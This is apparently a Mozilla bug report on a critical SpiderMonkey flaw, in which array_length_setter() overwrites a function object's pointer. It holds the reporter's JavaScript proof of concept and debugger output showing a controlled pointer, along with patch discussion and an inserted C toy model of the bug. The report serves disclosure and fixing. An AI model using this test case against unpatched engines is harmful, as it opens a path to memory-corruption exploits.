Closed Bug 390598 Opened 17 years ago Closed 17 years ago

array_length_setter() is exploitable

Categories

(Core :: JavaScript Engine, defect, P1)

defect

Tracking


VERIFIED FIXED
mozilla1.9alpha8

People

(Reporter: sync2d, Assigned: brendan)

References

Details

(Keywords: crash, regression, testcase, Whiteboard: [sg:critical] post 1.8-branch)

Attachments

(3 files, 2 obsolete files)

$ cat array-length.txt
function exploit() {
  var fun = function () {};
  fun.__proto__ = [];
  fun.length = 0x50505050 >> 1;
  fun();
}
exploit();

$ dbg.obj/js array-length.txt
Assertion failure: OBJ_GET_CLASS(cx, obj) == &js_ArrayClass, at jsarray.c:404

$ gdb --eval run --args opt.obj/js array-length.txt
...
Program received signal SIGSEGV, Segmentation fault.
js_Interpret (cx=0xaa0750, pc=0xaa3cfa ":", result=0x97ec84)
    at jsinterp.c:3925
3925                    if (fun->flags & JSFUN_INTERPRETED) {
(gdb) print fun
$1 = (JSFunction *) 0x50505050
Keywords: testcase
Whiteboard: [sg:critical]
Attached patch fix (obsolete) — Splinter Review
Assignee: general → brendan
Status: NEW → ASSIGNED
Attachment #274976 - Flags: review?(igor)
Priority: -- → P1
Target Milestone: --- → mozilla1.9 M8
Attachment #274976 - Attachment is obsolete: true
Attachment #274978 - Flags: review?(igor)
Attachment #274976 - Flags: review?(igor)
Attachment #274978 - Flags: review?(igor) → review+
Comment on attachment 274976 [details] [diff] [review]
fix

This is OK as a security fix.
Attachment #274976 - Flags: review+
(In reply to comment #3)
> (From update of attachment 274976 [details] [diff] [review])
> This is OK as a security fix.

The problem is that

function F() {} F.prototype = []; var x = new F(); x.length = 10; print(x.length);

now prints 0, not 10 as required by ECMA.
(In reply to comment #4)
> (In reply to comment #3)
> > (From update of attachment 274976 [details] [diff] [review] [details])
> > This is OK as a security fix.
> 
> The problem is that
> 
> function F() {} F.prototype = []; var x = new F(); x.length = 10;
> print(x.length);
> 
> now prints 0, not 10 as required by ECMA.

I thought this was an old bug, but I was wrong:

$ ../src.ref/Darwin_DBG.OBJ/js
js> function F() {} F.prototype = []; var x = new F(); x.length = 10;
10
js> x.length
10

Recent regression, due to bug 385393 of course. Let me try to fix it and fix this bug.

/be
(My ../src.ref/ tree pre-dates last night's landings.)

/be
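To make the two points of this thread concrete (the test case above, where a function object with an Array prototype reaches the array length setter and its private JSFunction* slot is overwritten, and brendan's ECMA point that x.length = 10 on a non-array must still yield 10), here is an added toy model in C. It is not SpiderMonkey code: the tagged-word layout, slot numbering and the "define an own property" fallback are assumptions chosen to mirror the behaviour the comments describe.

```c
#include <stdint.h>
#include <stdbool.h>

/* Assumed tagging: low bit set marks an int or a private pointer, as the model needs. */
typedef uintptr_t jsval;
#define INT_TO_JSVAL(i)     (((jsval)(i) << 1) | 1)
#define JSVAL_TO_PRIVATE(v) ((void *)((v) & ~(jsval)1))

typedef enum { CLASS_ARRAY, CLASS_FUNCTION } ObjClass;
typedef struct { int arity; } JSFunction;          /* stand-in for the real struct */

typedef struct {
    ObjClass clasp;
    jsval    fslots[1];       /* slot 0: array length for Arrays, private JSFunction* for functions */
    bool     has_own_length;  /* model of an ordinary "length" property on the object itself */
    uint32_t own_length;
} JSObject;

/* Buggy setter, modelled on the report: trusts that the receiver is an Array. */
static void array_length_setter_unchecked(JSObject *obj, uint32_t newlen) {
    obj->fslots[0] = INT_TO_JSVAL(newlen);
}

/* Checked setter: only touch the reserved slot when the receiver really is an Array;
   otherwise define an ordinary own property so `x.length = 10` still reads back 10. */
static void array_length_setter_checked(JSObject *obj, uint32_t newlen) {
    if (obj->clasp != CLASS_ARRAY) {
        obj->has_own_length = true;
        obj->own_length = newlen;
        return;
    }
    obj->fslots[0] = INT_TO_JSVAL(newlen);
}

/* What the interpreter does on a call: recover the JSFunction* from the private slot. */
static JSFunction *fun_from_object(const JSObject *obj) {
    return (JSFunction *)JSVAL_TO_PRIVATE(obj->fslots[0]);
}

static JSFunction real_fun = { 0 };

/* Pointer the interpreter would dereference after `fun.length = 0x50505050 >> 1` (unchecked). */
static uintptr_t pointer_after_unchecked_set(void) {
    JSObject fun = { CLASS_FUNCTION, { (jsval)&real_fun | 1 }, false, 0 };
    array_length_setter_unchecked(&fun, 0x50505050u >> 1);
    return (uintptr_t)fun_from_object(&fun);   /* 0x50505050: the gdb value from the report */
}

/* With the class check, the JSFunction* survives and the object gets an own length of 10. */
static bool checked_set_preserves_function(void) {
    JSObject fun = { CLASS_FUNCTION, { (jsval)&real_fun | 1 }, false, 0 };
    array_length_setter_checked(&fun, 10);
    return fun_from_object(&fun) == &real_fun && fun.has_own_length && fun.own_length == 10;
}
```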
Attachment #274978 - Attachment is obsolete: true
Attachment #274983 - Flags: review?(igor)
Comment on attachment 274983 [details] [diff] [review]
alterna-fix 2, restores lost ECMA compat

This is a simple and nice workaround.
Attachment #274983 - Flags: review?(igor) → review+
Flags: blocking1.9+
Fixed:

js/src/jsarray.c 3.116

/be
Status: ASSIGNED → RESOLVED
Closed: 17 years ago
Resolution: --- → FIXED
Flags: in-testsuite+
verified fixed 1.9.0 linux/mac*/windows.
Status: RESOLVED → VERIFIED
Group: core-security
Flags: wanted1.8.1.x-
Keywords: regression
Whiteboard: [sg:critical] → [sg:critical] post 1.8-branch
test checked into 1.9.0, 1.9.1, 1.9.2, tracemonkey. 1.9.3 will get picked up in the next merge.